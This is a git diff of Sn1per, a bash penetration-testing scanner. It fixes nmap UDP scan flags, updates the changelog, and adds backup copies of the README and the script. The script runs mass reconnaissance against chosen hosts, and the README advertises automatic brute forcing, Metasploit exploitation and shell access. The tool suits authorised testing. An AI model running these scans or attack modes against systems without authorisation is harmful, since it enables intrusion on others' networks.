diff --git a/README.md b/README.md index fbe6ab9..14d93ec 100644 --- a/README.md +++ b/README.md @@ -51,6 +51,9 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc ``` ## CHANGELOG: +* v1.8b - Fixed bug with NMap UDP scan options +* v1.8b - Fixed install.sh dependencies +* v1.8b - Fixed jexboss options * v1.8a - Updated sub-domain hijack list of domains (CC: th3gundy) * v1.8 - Added sub-domain hijack scans for all sub-domains * v1.8 - Added auto explort of all sub-domains to /domains directory diff --git a/README.md~ b/README.md~ new file mode 100644 index 0000000..fbe6ab9 --- /dev/null +++ b/README.md~ @@ -0,0 +1,139 @@ +# Sn1per - Automated Pentest Recon Scanner +![alt tag](https://github.com/1N3/Sn1per/blob/master/Sn1per-logo.png) + +## ABOUT: +Sn1per is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. + +## FEATURES: +* Automatically collects basic recon (ie. whois, ping, DNS, etc.) +* Automatically launches Google hacking queries against a target domain +* Automatically enumerates open ports +* Automatically brute forces sub-domains and DNS info +* Automatically checks for sub-domain hijacking +* Automatically runs targeted NMap scripts against open ports +* Automatically runs targeted Metasploit scan and exploit modules +* Automatically scans all web applications for common vulnerabilities +* Automatically brute forces all open services +* Automatically exploit remote hosts to gain remote shell access +* Performs high level enumeration of multiple hosts +* Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds + +## INSTALL: +``` +./install.sh - Installs all dependencies OR upgrades existing Sn1per installations. Best run from Kali Linux. +``` + +## USAGE: +``` +# sniper +# sniper stealth +# sniper discover +# sniper port +# sniper web +# sniper nobrute +# sniper airstrike +# sniper nuke +``` + +### MODES: +* REPORT: Outputs all results to text in the loot directory for later reference. To enable reporting, append 'report' to any sniper mode or command. +* STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking +* DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans. +* PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode. +* WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly. +* NOBRUTE: Launches a full scan against a target host/domain without brute forcing services. +* AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning. +* NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke. + +## SAMPLE REPORT: +``` +https://gist.github.com/1N3/8214ec2da2c91691bcbc +``` + +## CHANGELOG: +* v1.8a - Updated sub-domain hijack list of domains (CC: th3gundy) +* v1.8 - Added sub-domain hijack scans for all sub-domains +* v1.8 - Added auto explort of all sub-domains to /domains directory +* v1.8 - Added additional stealth and airstrike checks for port 80 and 443 +* v1.8 - Fixed issue with theHarvester not working with google +* v1.7g - Added email security/spoofing checks +* v1.7f - Added Zenmap XML auto-imports +* v1.7f - Added ClamAV RCE Nmap script +* v1.7e - Fixed minor issue with airstrike and nuke mode +* v1.7e - Fixed minor issues with discover mode +* v1.7e - Added minor cosmetic improvements to reports +* v1.7e - Disabled automatic brute forcing by default +* v1.7e - Added automatic brute force setting in script vars +* v1.7d - Added sslyze +* v1.7d - Added 'discover' mode for full subnet scans +* v1.7d - Added verbosity to scan tasks to separate sub-tasks better +* v1.7c - Added plain text reporting +* v1.7c - Improved loot directory structure and sorting +* v1.7b - Fixed issue with airstrike mode not scanning correctly +* v1.7b - Improved passive recon performance +* v1.7a - Improved NMap http scan performance +* v1.7a - Removed joomscan due to verbosity issues +* v1.7 - Added uniscan web vulnerability scanner +* v1.7 - Added joomscan Joomla scanner +* v1.7 - Improved web scan performance +* v1.7 - Fixed issue with inurlbr output +* v1.7 - Added remote desktop viewing for RDP connections +* v1.7 - Added experimental Metasploit exploit for Apache Struts RCE (CVE-2016-3081) +* v1.6e - Added reporting option for nobrute mode (CC. @mero01) +* v1.6e - Improved SMB scan performance/optimization added +* v1.6d - Improved NMap scan performance options +* v1.6d - Added xprobe2 OS finger printing tool +* v1.6d - Added jexbos JBoss autopwn +* v1.6d - Merged fix for theharvester package (CC. @RubenRocha) +* v1.6d - Merged fix for SuperMicroScanner (CC. @mero01) +* v1.6c - Add report mode for web scans +* v1.6c - Fixed issues with Sublist3r and theharvester +* v1.6c - Added Shocker Shellshock exploitation scanner +* v1.6b - Added Sublist3r sub-domain brute tool +* v1.6b - Added cutycapt web screenshot util +* v1.6a - Added improvements to recon phase +* v1.6a - Fixed small issue with 3rd party extension +* v1.6a - Various improvements to overall optimization of scans +* v1.6a - Added new "web" mode for full web application scans +* v1.6 - Added 4 new modes including: stealth, port, airstrike and nuke +* v1.6 - Added Java de-serialization scanner +* v1.6 - Added reporting option to output to console and text file for all scans +* v1.6 - Added option to set Sn1per full path for universal command line access +* v1.6 - Added in DirBuster for web file brute forcing +* v1.6 - Fixed issue with sderr errors in TheHarvester +* v1.5e - Removed shodan command line tool due to issues +* v1.5e - Fixed wafwoof installation in kali 2.0 +* v1.5d - Fixed minor issues with port 513/tmp and 514/tcp checks +* v1.5c - Fixed issue which broke link to sniper directory +* v1.5b - Added Squid Proxy checks port 3128/tcp +* v1.5b - Fixed shodan setup options in install.sh +* v1.5b - Fixed syntax error with theHarvester in install.sh +* v1.5a - Fixed syntax error with port 8081 checks +* v1.5a - Added Arachni integration +* v1.5a - Added vsftpd, proftpd, mysql, unrealircd auto exploits +* v1.5 - Added Metasploit scan and auto-exploit modules +* v1.5 - Added additional port checks +* v1.5 - Added full TCP/UDP NMap XML output +* v1.5 - Auto tune scan for either IP or hostname/domain +* v1.4h - Added auto IP/domain name scan configurations +* v1.4g - Added finger enumeration scripts +* v1.4g - Fixed nmap -p 445 target issue +* v1.4g - Fixed smtp-enum target issue +* v1.4f - Fixed BruteX directory bug +* v1.4e - Fixed reported errors install.sh +* v1.4e - Added auto-upgrade option to install.sh for existing Sn1per installs +* v1.4d - Fixed missing rake gem install dependency +* v1.4c - Reordered 3rd party extensions +* v1.4b - Fixed install.sh executable references +* v1.4b - Fixed Yasou dependencies in install.sh +* v1.4b - Fixed minor issues with BruteX loot directory +* v1.4 - Added Yasou for automatic web form brute forcing +* v1.4 - Added MassBleed for SSL vulnerability detection +* v1.4 - Added Breach-Miner for detection of breached accounts +* v1.4 - Fixed minor errors with nmap +* v1.4 - Removed debug output from goohak from displaying on console + +## FUTURE: +* Add install.sh for Ubuntu based systems +* Add install path to install.sh for universal access +* Add scan config options to enabled/disable certain scan tasks (ie. brute force, osint, web scans, etc.) diff --git a/sniper b/sniper index 1446e99..bbf93cf 100644 --- a/sniper +++ b/sniper @@ -234,7 +234,7 @@ if [ "$MODE" = "stealth" ]; then echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET" nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" - nmap -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET + nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" wafw00f http://$TARGET wafw00f https://$TARGET @@ -331,7 +331,7 @@ if [ "$MODE" = "airstrike" ]; then echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET" nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $a -oX $LOOT_DIR/nmap-$a.xml echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" - nmap -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a + nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" wafw00f http://$a wafw00f https://$a @@ -458,7 +458,7 @@ echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=---- if [ -z "$OPT1" ]; then nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" - nmap -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET + nmap -sU -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET elif [ "$OPT1" == "web" ]; then nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml else @@ -555,7 +555,7 @@ then echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET" else echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET" - nmap -sV -T5 --script=dns* -p U:53,T:53 $TARGET + nmap -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET fi if [ -z "$port_79" ]; diff --git a/sniper~ b/sniper~ new file mode 100644 index 0000000..1446e99 --- /dev/null +++ b/sniper~ @@ -0,0 +1,1144 @@ +#!/bin/bash +# + -- --=[Sn1per v1.8 by 1N3 +# + -- --=[http://crowdshield.com +# +# Sn1per - Automated Pentest Recon Tool +# +# FEATURED: +# - Automatically collect recon info (ie. whois, ping, DNS, etc.) +# - Automatically collects Google hacking recon info +# - Automatically run port scans +# - Automatically brute force sub-domains via DNS +# - Automatically checks for sub-domain hijacking +# - Automatically run targeted nmap scripts against open ports +# - Automatically scans all web applications +# - Automatically brute forces all open services +# - Automatically runs targeted metasploit scan and exploit modules +# - Automatically scan multiple hosts +# +# INSTALL: +# ./install.sh - Installs all dependencies. Best run from Kali Linux. +# +# USAGE: +# ./sniper +# ./sniper +# ./sniper discover +# ./sniper stealth +# ./sniper port +# ./sniper web +# ./sniper airstrike +# ./sniper nuke +# ./sniper loot +# +# UNCOMMENT AND SET TARGET DIR FOR UNIVERSAL ACCESS (ie. sniper ) +# cd /pentest/web/Sn1per/ + +clear + +TARGET="$1" +MODE="$2" +OPT1="$3" +LOOT_DIR="loot" +CMSMAP="CMSmap/cmsmap.py" +SAMRDUMP="bin/samrdump.py" +DNSDICT6="bin/dnsdict6" +INURLBR="bin/inurlbr.php" +USER_FILE="BruteX/wordlists/simple-users.txt" +PASS_FILE="BruteX/wordlists/password.lst" +DNS_FILE="BruteX/wordlists/namelist.txt" +SUPER_MICRO_SCAN="SuperMicro-Password-Scanner/supermicro_scan.sh" +THREADS="30" +OKBLUE='\033[94m' +OKRED='\033[91m' +OKGREEN='\033[92m' +OKORANGE='\033[93m' +RESET='\e[0m' +REGEX='^[0-9]+$' +DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) + +# ENABLE/DISABLE AUTOMATIC BRUTE FORCE +# DEFAULT IS "0" (DISABLED) +AUTOBRUTE="0" + +if [ -z $TARGET ]; then + echo -e "$OKRED ____ $RESET" + echo -e "$OKRED _________ / _/___ ___ _____$RESET" + echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" + echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" + echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" + echo -e "$OKRED /_/ $RESET" + echo -e "" + echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET" + echo -e "$OKORANGE + -- --=[sn1per v1.8 by 1N3$RESET" + echo -e "$OKORANGE + -- --=[Usage: sn1per $RESET" + echo "" + exit +fi + +if [[ ${TARGET:0:1} =~ $REGEX ]]; + then + SCAN_TYPE="IP" +else + SCAN_TYPE="DOMAIN" +fi + +clear + +if [ "$MODE" = "report" ]; then + ./sniper $TARGET | tee ./loot/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1 + exit +fi + +if [ "$TARGET" = "loot" ]; then + echo -e "$OKRED ____ $RESET" + echo -e "$OKRED _________ / _/___ ___ _____$RESET" + echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" + echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" + echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" + echo -e "$OKRED /_/ $RESET" + echo "" + cd $PWD/loot/ + echo -e "$OKORANGE + -- --=[Sorting loot directory ($PWD)" + mkdir reports/ -p 2> /dev/null + echo -e "$OKORANGE + -- --=[Generating reports..." + for a in `ls sniper-*.txt 2>/dev/null`; do echo "$a" >> reports/$a && sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[m|K]//g" $a > reports/$a; done + mv $PWD/report-* $PWD/reports/ 2> /dev/null + mkdir $PWD/screenshots/ -p 2> /dev/null + mv $PWD/*.jpg $PWD/screenshots/ 2> /dev/null + mkdir $PWD/nmap -p 2> /dev/null + mv $PWD/*.xml $PWD/nmap/ 2> /dev/null + mkdir $PWD/domains -p 2> /dev/null + mv $PWD/domains-* $PWD/domains/ 2> /dev/null + mkdir $PWD/output -p 2> /dev/null + mv $PWD/sniper-* $PWD/output 2> /dev/null + rm -f $PWD/.fuse_* 2> /dev/null + echo -e "$OKORANGE + -- --=[Opening loot directory..." + iceweasel $PWD &> /dev/null & + zenmap -f $PWD/nmap/ &> /dev/null & + echo -e "$OKORANGE + -- --=[Done!" + exit +fi + +if [ "$MODE" = "discover" ]; then + echo -e "$OKRED ____ /\\" + echo -e "$OKRED Sn1per by 1N3 @CrowdShield \ \\" + echo -e "$OKRED https://crowdshield.com \ \\" + echo -e "$OKRED ___ / \\" + echo -e "$OKRED \ \\" + echo -e "$OKRED === > [ \\" + echo -e "$OKRED / \ \\" + echo -e "$OKRED \ / /" + echo -e "$OKRED === > [ /" + echo -e "$OKRED / /" + echo -e "$OKRED ___ \ /" + echo -e "$OKRED / /" + echo -e "$OKRED ____ / /" + echo -e "$OKRED \/$RESET" + echo "" + echo -e "$OKGREEN + -- ----------------------------=[Running Ping Discovery Scan]=------------- -- +$RESET" + nmap -sP $TARGET + echo -e "$OKGREEN + -- ----------------------------=[Checking ARP Cache]=---------------------- -- +$RESET" + arp -a -n + echo -e "$OKGREEN + -- ----------------------------=[Running Port Discovery Scan]=------------- -- +$RESET" + unicornscan $TARGET -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 2>/dev/null | awk '{print $6}' | sort -u > $PWD/loot/sniper-ips.txt + echo -e "$OKGREEN + -- ----------------------------=[Current Targets]=------------------------- -- +$RESET" + cat $PWD/loot/sniper-ips.txt + echo -e "$OKGREEN + -- ----------------------------=[Launching Sn1per Scans]=------------------ -- +$RESET" + echo "" + if [ "$OPT1" = "report" ]; then + for a in `cat $PWD/loot/sniper-ips.txt` + do sniper $a stealth report + done + exit + fi + for a in `cat $PWD/loot/sniper-ips.txt` + do sniper $a stealth + done + exit +fi + +if [ "$MODE" = "web" ]; then + if [ "$OPT1" = "report" ]; then + ./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + exit + fi +fi + +if [ "$MODE" = "stealth" ]; then + if [ "$OPT1" = "report" ]; then + ./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + exit + fi + echo -e "$OKRED ____ $RESET" + echo -e "$OKRED _________ / _/___ ___ _____$RESET" + echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" + echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" + echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" + echo -e "$OKRED /_/ $RESET" + echo -e "$RESET" + echo -e "$OKORANGE + -- --=[http://crowdshield.com" + echo -e "$OKORANGE + -- --=[sn1per v1.8 by 1N3" + echo -e "$OKRED " + echo -e "$OKRED ./\." + echo -e "$OKRED ./ '\." + echo -e "$OKRED \. '\." + echo -e "$OKRED '\. '\." + echo -e "$OKRED '\. '\." + echo -e "$OKRED '\. '\." + echo -e "$OKRED ./ '\." + echo -e "$OKRED ./ ____'\." + echo -e "$OKRED ./ < '\." + echo -e "$OKRED \-------\ '> '\." + echo -e "$OKRED '\=====> ___< '\." + echo -e "$OKRED ./-----/ __________'\." + echo -e "$OKRED "' \.------\ _____ ___(_)(_\."\' + echo -e "$OKRED '\=====> < ./'" + echo -e "$OKRED ./-----/ '> ./" + echo -e "$OKRED \. ___< ./" + echo -e "$OKRED '\. ./" + echo -e "$OKRED '\. ./" + echo -e "$OKRED '\. ./" + echo -e "$OKRED ./ ./" + echo -e "$OKRED ./ ./ Carl Pilcher" + echo -e "$OKRED ./ ./" + echo -e "$OKRED ./ ./" + echo -e "$OKRED ./ ./" + echo -e "$OKRED \. ./" + echo -e "$OKRED '\. ./" + echo -e "$OKRED '\/" + echo -e "$RESET" + echo -e "$OKORANGE + -- --=[Launching stealth scan: $TARGET $RESET" + echo -e "$OKGREEN $RESET" + echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET" + nslookup $TARGET + host $TARGET + if [ $SCAN_TYPE == "DOMAIN" ]; + then + echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET" + whois $TARGET + echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET" + theharvester -d $TARGET -l 100 -b bing 2> /dev/null + echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET" + dig -x $TARGET + dnsenum $TARGET + mv -f *_ips.txt loot/ 2>/dev/null + echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET" + python Sublist3r/sublist3r.py -d $TARGET -vvv -o loot/domains/domains-$TARGET.txt 2>/dev/null + dos2unix loot/domains/domains-$TARGET.txt 2>/dev/null + echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET" + for a in `cat loot/domains/domains-$TARGET.txt`; do dig $a CNAME | egrep -i "heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot" 2>/dev/null; done; + echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET" + python SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null + fi + echo "" + echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET" + nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $TARGET -oX $LOOT_DIR/nmap-$TARGET.xml + echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" + nmap -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $TARGET + echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" + wafw00f http://$TARGET + wafw00f https://$TARGET + echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" + whatweb http://$TARGET + whatweb https://$TARGET + xsstracer $TARGET 80 + xsstracer $TARGET 443 + echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET" + sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $TARGET + sslscan --no-failed $TARGET + testssl $TARGET + echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" + cutycapt --url=http://$TARGET --out=loot/$TARGET-port80.jpg + echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$TARGET-port80.jpg" + cutycapt --url=https://$TARGET --out=loot/$TARGET-port443.jpg + echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$TARGET-port443.jpg" + echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET" + exit +fi + +if [ "$MODE" = "airstrike" ]; then + if [ "$OPT1" = "report" ]; then + ./sniper $TARGET $MODE | tee ./loot/sniper-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + exit + fi + echo -e "$OKRED ____ $RESET" + echo -e "$OKRED _________ / _/___ ___ _____$RESET" + echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" + echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" + echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" + echo -e "$OKRED /_/ $RESET" + echo -e "$RESET" + echo -e "$OKORANGE + -- --=[http://crowdshield.com" + echo -e "$OKORANGE + -- --=[sn1per v1.8 by 1N3" + + for a in `cat $TARGET`; + do + echo -e "$OKRED |" + echo -e "$OKRED | |" + echo -e "$OKRED | -/_\-" + echo -e "$OKRED -/_\- ______________(/ . \)______________" + echo -e "$OKRED ____________(/ . \)_____________ \___/ <>" + echo -e "$OKRED <> \___/ <> <>" + echo -e "$OKRED " + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED <>" + echo -e "$OKRED ||" + echo -e "$OKRED || BIG" + echo -e "$OKRED _____ __ <> (^)))^ BOOM!" + echo -e "$OKRED BOOM!/(( )\ BOOM!(( ))) ( ( )" + echo -e "$OKRED ---- (__()__)) (() ) )) ( ( ( )" + echo -e "$OKRED || |||____|------ \ (/ ___ (__\ /__)" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED |__||| | |---|---|||___| |___-----|||||" + echo -e "$OKRED | ||. | | | ||| |||||" + echo -e "$OKRED __________________________________________________________" + echo -e "$OKRED Bomb raid (contributed by Michael aka SNOOPY@DRYCAS.CLUB.CC.CMU.EDU)" + echo -e "$RESET" + echo -e "$OKORANGE + -- --=[Launching airstrike: $a $RESET" + echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET" + nslookup $a + host $a + + if [[ ${a:0:1} =~ $REGEX ]]; + then + SCAN_TYPE="IP" + else + SCAN_TYPE="DOMAIN" + fi + + if [ $SCAN_TYPE == "DOMAIN" ]; + then + echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET" + whois $a + echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET" + theharvester -d $a -l 100 -b bing 2> /dev/null + echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET" + dig -x $a + dnsenum $a + mv -f *_ips.txt loot/ 2>/dev/null + echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET" + python Sublist3r/sublist3r.py -d $a -vvv -o loot/domains/domains-$a.txt 2>/dev/null + dos2unix loot/domains/domains-$a.txt 2>/dev/null + echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET" + for b in `cat loot/domains/domains-$a.txt`; do dig $b CNAME | egrep -i 'heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done; + echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET" + python SimpleEmailSpoofer/spoofcheck.py $a 2>/dev/null + fi + echo "" + echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=------------------- -- +$RESET" + nmap -sS -T5 --open -p 21,22,23,25,53,79,80,110,111,135,139,162,389,443,445,512,513,514,1099,1524,2049,2121,3306,3310,3389,3632,5432,5800,5900,6667,8000,8009,8080,8180,8443,8888,10000,49152 $a -oX $LOOT_DIR/nmap-$a.xml + echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET" + nmap -T5 --open -p U:53,U:67,U:68,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049 $a + echo -e "$OKGREEN + -- ----------------------------=[Checking for WAF]=------------------------ -- +$RESET" + wafw00f http://$a + wafw00f https://$a + echo -e "$OKGREEN + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +$RESET" + whatweb http://$a + whatweb https://$a + xsstracer $a 80 + xsstracer $a 443 + echo -e "$OKGREEN + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +$RESET" + sslyze --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers $a + sslscan --no-failed $a + testssl $a + echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET" + cutycapt --url=http://$a --out=loot/$a-port80.jpg + echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$a-port80.jpg" + cutycapt --url=https://$a --out=loot/$a-port443.jpg + echo -e "$OKRED[+]$RESET Screenshot saved to $PWD/loot/$a-port443.jpg" + echo -e "$OKGREEN + -- ----------------------------=[Done!]=----------------------------------- -- +$RESET" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + done; + exit +fi + +if [ "$MODE" = "port" ]; then + if [ -z "$OPT1" ]; then + echo -e "$OKRED + -- --=[Error: You need to enter a port number. $RESET" + exit + fi +fi + +if [ "$MODE" = "nuke" ]; then + if [ "$OPT1" = "report" ]; then + ./sniper $TARGET $MODE | tee ./loot/sniper-$TARGET-$MODE-`date +%Y%m%d%H%M`.txt 2>&1 + exit + fi + for a in `cat $TARGET`; do + echo -e "$OKRED " + echo -e "$OKRED ____" + echo -e "$OKRED __,-~~/~ \`---." + echo -e "$OKRED _/_,---( , )" + echo -e "$OKRED __ / < / ) \___" + echo -e "$OKRED - ------===;;;'====------------------===;;;===----- - -" + echo -e "$OKRED \/ ~'~'~'~'~'~\~'~)~'/" + echo -e "$OKRED (_ ( \ ( > \)" + echo -e "$OKRED \_( _ < >_>'" + echo -e "$OKRED ~ \`-i' ::>|--\"" + echo -e "$OKRED I;|.|.|" + echo -e "$OKRED <|i::|i|\`." + echo -e "$OKRED (\` ^''\`-' ')" + echo -e "$OKRED --------------------------------------------------------- $RESET" + echo -e "$OKORANGE + -- --=[WARNING! Nuking ALL target! $RESET" + ./sniper $a + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + echo -e "" + done + exit +fi + +echo -e "$OKRED ____ $RESET" +echo -e "$OKRED _________ / _/___ ___ _____$RESET" +echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" +echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" +echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" +echo -e "$OKRED /_/ $RESET" +echo -e "$RESET" +echo -e "$OKORANGE + -- --=[http://crowdshield.com" +echo -e "$OKORANGE + -- --=[sn1per v1.8 by 1N3" +echo -e "$RESET" +echo -e "$OKGREEN + -- ----------------------------=[Running Nslookup]=------------------------ -- +$RESET" +nslookup $TARGET +host $TARGET +echo -e "$OKGREEN + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +$RESET" +xprobe2 $TARGET +if [ $SCAN_TYPE == "DOMAIN" ]; +then + echo -e "$OKGREEN + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +$RESET" + whois $TARGET + echo -e "$OKGREEN + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +$RESET" + theharvester -d $TARGET -l 100 -b bing 2> /dev/null + echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +$RESET" + dig -x $TARGET + dnsenum $TARGET + mv -f *_ips.txt loot/ 2>/dev/null + echo -e "$OKGREEN + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +$RESET" + python Sublist3r/sublist3r.py -d $TARGET -vvv -o loot/domains/domains-$TARGET.txt 2>/dev/null + dos2unix loot/domains/domains-$TARGET.txt 2>/dev/null + echo -e "$OKGREEN + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +$RESET" + for a in `cat loot/domains/domains-$TARGET.txt`; do dig $a CNAME | egrep -i 'heroku|github|bitbucket|squarespace|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign monitor|cargocollective|statuspage|tumblr|amazonaws|hubspot' 2>/dev/null; done; + echo -e "$OKGREEN + -- ----------------------------=[Checking Email Security]=----------------- -- +$RESET" + python SimpleEmailSpoofer/spoofcheck.py $TARGET 2>/dev/null +fi +echo 